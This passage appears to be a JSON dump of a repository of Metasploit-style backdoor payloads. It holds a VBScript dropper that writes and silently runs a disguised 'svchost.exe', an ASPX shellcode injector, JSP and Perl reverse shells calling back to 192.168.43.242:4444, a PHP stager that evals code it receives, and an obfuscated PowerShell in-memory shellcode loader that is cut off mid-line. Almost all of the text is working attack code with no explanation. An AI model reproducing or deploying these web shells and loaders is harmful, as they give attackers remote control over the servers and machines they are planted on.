hr(179)&Chr(198)&Chr(204)&Chr(83)&Chr(235)&Chr(129)&Chr(188)&Chr(8)&Chr(235)&Chr(121)&Chr(254)&Chr(109)&Chr(210)&Chr(12)&Chr(29)&Chr(83)&Chr(0)&Chr(110)&Chr(240)&Chr(248)&Chr(35)&Chr(171)&Chr(253)&Chr(136)&Chr(35)&Chr(30)&Chr(117)&Chr(2)&Chr(197)&Chr(90)&Chr(44)&Chr(6)&Chr(159)&Chr(55)&Chr(38)&Chr(84)&Chr(152)&Chr(180)&Chr(231)&Chr(212)&Chr(174)&Chr(237)&Chr(141)&Chr(205)&Chr(34)&Chr(48)&Chr(129)&Chr(142)&Chr(78)&Chr(141)&Chr(238)&Chr(228)&Chr(174)&Chr(236)&Chr(152)&Chr(149)&Chr(157)&Chr(232)&Chr(192)&Chr(5)&Chr(66)&Chr(219)&Chr(50)&Chr(127)&Chr(34)&Chr(129)&Chr(159)&Chr(240)&Chr(224)&Chr(73)&Chr(232)&Chr(93)&Chr(184)&Chr(126)&Chr(142)&Chr(32)&Chr(72)&Chr(232)&Chr(145)&Chr(30)&Chr(168)\nwvWPLP=wvWPLP&Chr(190)&Chr(97)&Chr(246)&Chr(225)&Chr(190)&Chr(213)&Chr(196)&Chr(255)&Chr(19)&Chr(111)&Chr(174)&Chr(76)&Chr(239)&Chr(119)&Chr(60)&Chr(16)&Chr(153)&Chr(247)&Chr(46)&Chr(239)&Chr(107)&Chr(95)&Chr(98)&Chr(157)&Chr(27)&Chr(45)&Chr(44)&Chr(63)&Chr(121)&Chr(138)&Chr(166)&Chr(241)&Chr(188)&Chr(173)&Chr(37)&Chr(221)&Chr(26)&Chr(31)&Chr(84)&Chr(238)&Chr(157)&Chr(199)&Chr(120)&Chr(91)&Chr(225)&Chr(5)&Chr(31)&Chr(10)&Chr(219)&Chr(204)&Chr(108)&Chr(155)&Chr(127)&Chr(39)&Chr(88)&Chr(134)&Chr(129)&Chr(19)&Chr(194)&Chr(11)&Chr(240)&Chr(249)&Chr(170)&Chr(241)&Chr(5)&Chr(14)&Chr(129)&Chr(194)&Chr(252)&Chr(200)&Chr(217)&Chr(159)&Chr(63)&Chr(87)&Chr(184)&Chr(192)&Chr(228)&Chr(228)&Chr(92)&Chr(81)&Chr(6)&Chr(134)&Chr(75)&Chr(100)&Chr(5)&Chr(82)&Chr(190)&Chr(9)&Chr(56)&Chr(57)&Chr(39)&Chr(216)&Chr(46)&Chr(196)&Chr(16)&Chr(98)&Chr(254)&Chr(202)&Chr(198)&Chr(152)\nwvWPLP=wvWPLP&Chr(9)&Chr(50)&Chr(127)&Chr(59)&Chr(110)&Chr(116)&Chr(183)&Chr(217)&Chr(156)&Chr(18)&Chr(89)&Chr(31)&Chr(125)&Chr(213)&Chr(50)&Chr(7)&Chr(101)&Chr(198)&Chr(100)&Chr(74)&Chr(76)&Chr(70)&Chr(58)&Chr(103)&Chr(176)&Chr(46)&Chr(200)&Chr(249)&Chr(201)&Chr(97)&Chr(164)&Chr(16)&Chr(103)&Chr(74)&Chr(228)&Chr(3)&Chr(9)&Chr(79)&Chr(242)&Chr(107)&Chr(170)&Chr(26)&Chr(33)&Chr(146)&Chr(233)&Chr(7)&Chr(60)&Chr(46)&Chr(65)&Chr(90)&Chr(221)&Chr(46)&Chr(219)&Chr(44)&Chr(179)&Chr(172)&Chr(3)&Chr(249)&Chr(141)&Chr(189)&Chr(39)&Chr(111)&Chr(247)&Chr(61)&Chr(0)&Chr(117)&Chr(231)&Chr(102)&Chr(220)&Chr(153)&Chr(159)&Chr(202)&Chr(12)&Chr(128)&Chr(217)&Chr(19)&Chr(192)&Chr(92)&Chr(69)&Chr(208)&Chr(147)&Chr(207)&Chr(9)&Chr(179)&Chr(79)&Chr(241)&Chr(130)&Chr(183)&Chr(33)&Chr(13)&Chr(18)&Chr(100)&Chr(7)&Chr(172)&Chr(167)&Chr(181)&Chr(71)&Chr(206)&Chr(4)&Chr(107)\nwvWPLP=wvWPLP&Chr(68)&Chr(128)&Chr(22)&Chr(254)&Chr(150)&Chr(203)&Chr(239)&Chr(109)&Chr(183)&Chr(45)&Chr(227)&Chr(28)&Chr(107)&Chr(108)&Chr(162)&Chr(91)&Chr(89)&Chr(226)&Chr(74)&Chr(50)&Chr(23)&Chr(245)&Chr(117)&Chr(198)&Chr(197)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)\nwvWPLP=wvWPLP&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)\nwvWPLP=wvWPLP&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)\nwvWPLP=wvWPLP&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(44)&Chr(48)&Chr(0)&Chr(0)\nwvWPLP=wvWPLP&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(84)&Chr(48)&Chr(0)&Chr(0)&Chr(56)&Chr(48)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(64)&Chr(48)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(64)&Chr(48)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(156)&Chr(0)&Chr(69)&Chr(120)&Chr(105)&Chr(116)&Chr(80)&Chr(114)&Chr(111)&Chr(99)&Chr(101)&Chr(115)&Chr(115)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(48)&Chr(0)&Chr(0)&Chr(75)&Chr(69)&Chr(82)&Chr(78)&Chr(69)&Chr(76)&Chr(51)&Chr(50)&Chr(46)&Chr(100)&Chr(108)&Chr(108)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)\nwvWPLP=wvWPLP&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)\nwvWPLP=wvWPLP&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)\nwvWPLP=wvWPLP&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)\nwvWPLP=wvWPLP&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)\nwvWPLP=wvWPLP&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(185)&Chr(103)&Chr(193)&Chr(128)&Chr(176)&Chr(186)&Chr(49)&Chr(120)&Chr(24)&Chr(106)&Chr(53)&Chr(29)&Chr(169)&Chr(185)&Chr(208)&Chr(31)&Chr(12)&Chr(231)&Chr(176)&Chr(241)&Chr(95)&Chr(233)&Chr(122)&Chr(216)&Chr(214)&Chr(95)&Chr(138)&Chr(162)&Chr(8)&Chr(132)&Chr(52)&Chr(206)&Chr(221)&Chr(247)&Chr(244)&Chr(26)&Chr(119)&Chr(198)&Chr(248)&Chr(96)&Chr(87)&Chr(252)&Chr(214)&Chr(57)&Chr(25)&Chr(230)&Chr(218)&Chr(128)&Chr(175)&Chr(68)&Chr(75)&Chr(198)&Chr(17)&Chr(115)&Chr(145)&Chr(37)&Chr(148)&Chr(52)&Chr(106)&Chr(150)&Chr(9)&Chr(6)&Chr(168)\n\t\tDim eyulDLCNyPhly\n\t\tSet eyulDLCNyPhly = CreateObject(\"Scripting.FileSystemObject\")\n\t\tDim ztgykKkZMO\n\t\tDim IxLPuRIJZ\n\t\tDim sBpfsVCwFv\n\t\tDim KIymDWTNS\n\t\tSet IxLPuRIJZ = eyulDLCNyPhly.GetSpecialFolder(2)\n\t\tKIymDWTNS = IxLPuRIJZ & \"\\\" & eyulDLCNyPhly.GetTempName()\n\t\teyulDLCNyPhly.CreateFolder(KIymDWTNS)\n\t\tsBpfsVCwFv = KIymDWTNS & \"\\\" & \"svchost.exe\"\n\t\tSet ztgykKkZMO = eyulDLCNyPhly.CreateTextFile(sBpfsVCwFv,2,0)\n\t\tztgykKkZMO.Write wvWPLP\n\t\tztgykKkZMO.Close\n\t\tDim iRUzZUgWeAViBB\n\t\tSet iRUzZUgWeAViBB = CreateObject(\"Wscript.Shell\")\n\t\tiRUzZUgWeAViBB.run sBpfsVCwFv, 0, false\n\tEnd Sub\n\n\tgJjCrDeBtLBn\n%>\n"
  },
  {
    "path": "MSF_Trojanlinkage/shell.aspx",
    "content": "<%@ Page Language=\"C#\" AutoEventWireup=\"true\" %>\n<%@ Import Namespace=\"System.IO\" %>\n<script runat=\"server\">\n    private static Int32 MEM_COMMIT=0x1000;\n    private static IntPtr PAGE_EXECUTE_READWRITE=(IntPtr)0x40;\n\n    [System.Runtime.InteropServices.DllImport(\"kernel32\")]\n    private static extern IntPtr VirtualAlloc(IntPtr lpStartAddr,UIntPtr size,Int32 flAllocationType,IntPtr flProtect);\n\n    [System.Runtime.InteropServices.DllImport(\"kernel32\")]\n    private static extern IntPtr CreateThread(IntPtr lpThreadAttributes,UIntPtr dwStackSize,IntPtr lpStartAddress,IntPtr param,Int32 dwCreationFlags,ref IntPtr lpThreadId);\n\n    protected void Page_Load(object sender, EventArgs e)\n    {\n        byte[] cm4LyzU5U = new byte[341] {\n0xfc,0xe8,0x82,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,\n0xb7,0x4a,0x26,0x31,0xff,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf2,0x52,0x57,0x8b,0x52,0x10,0x8b,\n0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x01,0xd1,0x51,0x8b,0x59,0x20,0x01,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,\n0x01,0xd6,0x31,0xff,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf6,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,\n0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,\n0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,0x8d,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,\n0x77,0x26,0x07,0x89,0xe8,0xff,0xd0,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x6a,0x0a,\n0x68,0xc0,0xa8,0x2b,0xf2,0x68,0x02,0x00,0x11,0x5c,0x89,0xe6,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,\n0xff,0xd5,0x97,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0a,0xff,0x4e,0x08,0x75,0xec,0xe8,0x67,\n0x00,0x00,0x00,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7e,0x36,0x8b,0x36,0x6a,0x40,\n0x68,0x00,0x10,0x00,0x00,0x56,0x6a,0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,0x68,0x02,0xd9,\n0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7d,0x28,0x58,0x68,0x00,0x40,0x00,0x00,0x6a,0x00,0x50,0x68,0x0b,0x2f,0x0f,0x30,0xff,0xd5,\n0x57,0x68,0x75,0x6e,0x4d,0x61,0xff,0xd5,0x5e,0x5e,0xff,0x0c,0x24,0x0f,0x85,0x70,0xff,0xff,0xff,0xe9,0x9b,0xff,0xff,0xff,0x01,\n0xc3,0x29,0xc6,0x75,0xc1,0xc3,0xbb,0xf0,0xb5,0xa2,0x56,0x6a,0x00,0x53,0xff,0xd5 };\n\n        IntPtr lyJHQJZlCdU = VirtualAlloc(IntPtr.Zero,(UIntPtr)cm4LyzU5U.Length,MEM_COMMIT, PAGE_EXECUTE_READWRITE);\n        System.Runtime.InteropServices.Marshal.Copy(cm4LyzU5U,0,lyJHQJZlCdU,cm4LyzU5U.Length);\n        IntPtr yfjmxMfZtg = IntPtr.Zero;\n        IntPtr eKHXA = CreateThread(IntPtr.Zero,UIntPtr.Zero,lyJHQJZlCdU,IntPtr.Zero,0,ref yfjmxMfZtg);\n    }\n</script>\n"
  },
  {
    "path": "MSF_Trojanlinkage/shell.jsp",
    "content": "<%@page import=\"java.lang.*\"%>\n<%@page import=\"java.util.*\"%>\n<%@page import=\"java.io.*\"%>\n<%@page import=\"java.net.*\"%>\n\n<%\n  class StreamConnector extends Thread\n  {\n    InputStream ck;\n    OutputStream zl;\n\n    StreamConnector( InputStream ck, OutputStream zl )\n    {\n      this.ck = ck;\n      this.zl = zl;\n    }\n\n    public void run()\n    {\n      BufferedReader ov  = null;\n      BufferedWriter hgi = null;\n      try\n      {\n        ov  = new BufferedReader( new InputStreamReader( this.ck ) );\n        hgi = new BufferedWriter( new OutputStreamWriter( this.zl ) );\n        char buffer[] = new char[8192];\n        int length;\n        while( ( length = ov.read( buffer, 0, buffer.length ) ) > 0 )\n        {\n          hgi.write( buffer, 0, length );\n          hgi.flush();\n        }\n      } catch( Exception e ){}\n      try\n      {\n        if( ov != null )\n          ov.close();\n        if( hgi != null )\n          hgi.close();\n      } catch( Exception e ){}\n    }\n  }\n\n  try\n  {\n    String ShellPath;\nif (System.getProperty(\"os.name\").toLowerCase().indexOf(\"windows\") == -1) {\n  ShellPath = new String(\"/bin/sh\");\n} else {\n  ShellPath = new String(\"cmd.exe\");\n}\n\n    Socket socket = new Socket( \"192.168.43.242\", 4444 );\n    Process process = Runtime.getRuntime().exec( ShellPath );\n    ( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();\n    ( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();\n  } catch( Exception e ) {}\n%>\n"
  },
  {
    "path": "MSF_Trojanlinkage/shell.php",
    "content": "/*<?php /**/ error_reporting(0); $ip = '192.168.43.242'; $port = 4444; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f(\"tcp://{$ip}:{$port}\"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack(\"Nlen\", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();"
  },
  {
    "path": "MSF_Trojanlinkage/shell.pl",
    "content": "perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,\"192.168.43.242:4444\");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};'"
  },
  {
    "path": "MSF_Trojanlinkage/shell.psl",
    "content": "function yI6 {\n\tParam ($pwJF, $eI)\t\t\n\t$pk1l = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')\n\t\n\treturn $pk1l.GetMethod('GetProcAddress', [Type[]]@([System.Runtime.InteropServices.HandleRef], [String])).Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($pk1l.GetMethod('GetModuleHandle')).Invoke($null, @($pwJF)))), $eI))\n}\n\nfunction jQhd {\n\tParam (\n\t\t[Parameter(Position = 0, Mandatory = $True)] [Type[]] $iis,\n\t\t[Parameter(Position = 1)] [Type] $fM = [Void]\n\t)\n\t\n\t$ndG = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])\n\t$ndG.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $iis).SetImplementationFlags('Runtime, Managed')\n\t$ndG.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $fM, $iis).SetImplementationFlags('Runtime, Managed')\n\t\n\treturn $ndG.CreateType()\n}\n\n[Byte[]]$iLgSz = [System.Convert]::FromBase64String(\"/EiD5PDozAAAAEFRQVBSUVZIMdJlSItSYEiLUhhIi1IgSItyUEgPt0pKTTHJSDHArDxhfAIsIEHByQ1BAcHi7VJBUUiLUiCLQjxIAdBmgXgYCwIPhXIAAACLgIgAAABIhcB0Z0gB0FCLSBhEi0AgSQHQ41ZI/8lBizSISAHWTTHJSDHArEHByQ1BAcE44HXxTANMJAhFOdF12FhEi0AkSQHQZkGLDEhEi0AcSQHQQYsEiEgB0EFYQVheWVpBWEFZQVpIg+wgQVL/4FhBWVpIixLpS////11JvndzMl8zMgAAQVZJieZIgeygAQAASYnlSbwCABFcwKgr8kFUSYnkTInxQbpMdyYH/9VMiepoAQEAAFlBuimAawD/1WoKQV5QUE0xyU0xwEj/wEiJwkj/wEiJwUG66g/f4P/VSInHahBBWEyJ4kiJ+UG6maV0Yf/VhcB0Ckn/znXl6JMAAABIg+wQSIniTTHJagRBWEiJ+UG6AtnIX//Vg/gAflVIg8QgXon2akBBWWgAEAAAQVhIifJIMclBulikU+X/1UiJw0mJx00xyUmJ8EiJ2kiJ+UG6AtnIX//Vg/gAfShYQVdZaABAAABBWGoAWkG6Cy8PMP/VV1lBunVuTWH/1Un/zuk8////SAHDSCnGSIX2dbRB/+dYagBZScfC8LWiVv/V\")\n\t\t\n$zpx = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((yI6 kernel32.dll VirtualAlloc), (jQhd @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).Invoke([IntPtr]::Zero, $iLgSz.Length,0x3000, 0x40)\n[System.Runtime.InteropServices.Marshal]::Copy($iLgSz, 0, $zpx, $iLgSz.length)\n\n$sSYR = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((yI6 